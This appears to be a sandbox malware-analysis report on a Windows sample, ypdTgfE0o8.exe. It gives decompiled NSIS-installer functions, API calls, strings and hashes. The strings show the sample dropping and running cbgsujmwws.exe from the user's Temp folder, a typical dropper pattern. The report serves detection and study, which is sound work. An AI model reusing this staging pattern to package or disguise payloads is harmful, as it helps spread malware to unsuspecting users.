C:\Users\user\AppData\Local\Temp, xrefs: 00403C46, 00403C4E, 00403CF1, 00403CF7, 00403D07
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
_Nb, xrefs: 00403D3A, 00403DA2
1033, xrefs: 00403BD6, 00403C32
.exe, xrefs: 00403CC4

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-3911123587
Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406507(0x436800, _t91);
				E00406507(0x439000, E00405E22(0x436800));
				_t50 = GetFileSize(_t89, 0);
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x42a234 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E00403499(0x40ceb8, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a234 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x414eb8; // 0x9000
							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42a234 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x420ec4) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ypdTgfE0o8.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\ypdTgfE0o8.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\ypdTgfE0o8.exe,C:\Users\user\Desktop\ypdTgfE0o8.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174
Inst, xrefs: 00403162
G8@, xrefs: 00403227, 00403242
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
C:\Users\user\Desktop\ypdTgfE0o8.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
soft, xrefs: 0040316B

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ypdTgfE0o8.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-994376522
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\Users\\engineer\\AppData\\Lo";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507(0x40b5c8, _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, 0x40b5c8);
						_t64 = E00405B67("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8));
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,00000000,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
API String ID: 1941528284-1264366727
Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dc
0x004032de
0x004032de
0x004032e3
0x004032e8
0x004032f3
0x004032f3
0x00403305
0x00403450
0x00403450
0x00000000
0x0040330b
0x0040330f
0x0040343b
0x00403484
0x00403455
0x0040345b
0x0040345d
0x0040345d
0x0040346e
0x00000000
0x00403470
0x0040347c
0x00403435
0x00403435
0x00403452
0x00403452
0x00000000
0x00403452
0x0040347e
0x00403481
0x00000000
0x00403481
0x0040346e
0x0040348f
0x00000000
0x0040348f
0x00403440
0x00403442
0x00403442
0x0040344e
0x0040348c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040344e
0x00403320
0x00403323
0x00403328
0x00403328
0x00403332
0x00403335
0x00000000
0x00000000
0x00000000
0x00000000
0x0040333b
0x0040333b
0x0040333b
0x00403343
0x00403345
0x00403345
0x00403356
0x00000000
0x00000000
0x0040335c
0x0040335f
0x00403365
0x0040336b
0x00403373
0x00403379
0x0040337e
0x00403385
0x00403388
0x00000000
0x00000000
0x0040338e
0x00403394
0x00403396
0x004033a3
0x004033a5
0x004033d6
0x004033dc
0x004033e8
0x004033ed
0x004033ed
0x004033f2
0x00403429
0x00000000
0x00000000
0x00000000
0x004033f4
0x004033f8
0x0040340d
0x00403410
0x00403413
0x00403419
0x0040341d
0x00000000
0x00000000
0x00000000
0x00403423
0x004033ff
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x004033f2
0x00403431
0x00000000
0x00403431
0x00000000
0x0040333b

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

... %d%%, xrefs: 004033D0
G8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040687b
0x00406884
0x00406886
0x00406886
0x0040688a
0x0040689d
0x00406897
0x00406897
0x00406897
0x004068b6
0x004068ca
0x004068d1

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

%s%S.dll, xrefs: 004068B0
UXTHEME, xrefs: 0040686D
\, xrefs: 0040688C

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
